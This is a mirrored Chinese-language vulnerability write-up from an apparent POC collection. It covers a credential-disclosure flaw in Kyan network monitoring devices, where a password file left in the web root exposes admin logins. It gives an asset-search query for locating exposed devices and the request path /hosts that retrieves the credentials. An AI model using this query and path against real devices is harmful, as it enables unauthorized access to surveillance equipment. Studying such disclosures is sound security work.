mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 03:17:07 +00:00
27 lines
1.0 KiB
Markdown
27 lines
1.0 KiB
Markdown
|
|
# Kyan 网络监控设备密码泄露漏洞
|
|||
|
|
|
|||
|
|
# <font style="color:rgb(23, 46, 77);">一、漏洞简介</font>
|
|||
|
|
Kyan网络监控设备存在账号密码泄露漏洞,该漏洞是由于开发人员将记录账户密码的文件放到网站目录,攻击者可通过访问目录获取Kyan网络监控设备账号密码,进入控制后台。
|
|||
|
|
|
|||
|
|
# 二、影响版本
|
|||
|
|
+ Kyan 网络监控设备
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ hunter`app.name=="Kyan 网络监控设备"`
|
|||
|
|
+ 特征
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```plain
|
|||
|
|
/hosts
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-02-29 23:57:12
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ph8dyaez8p98x1ah>
|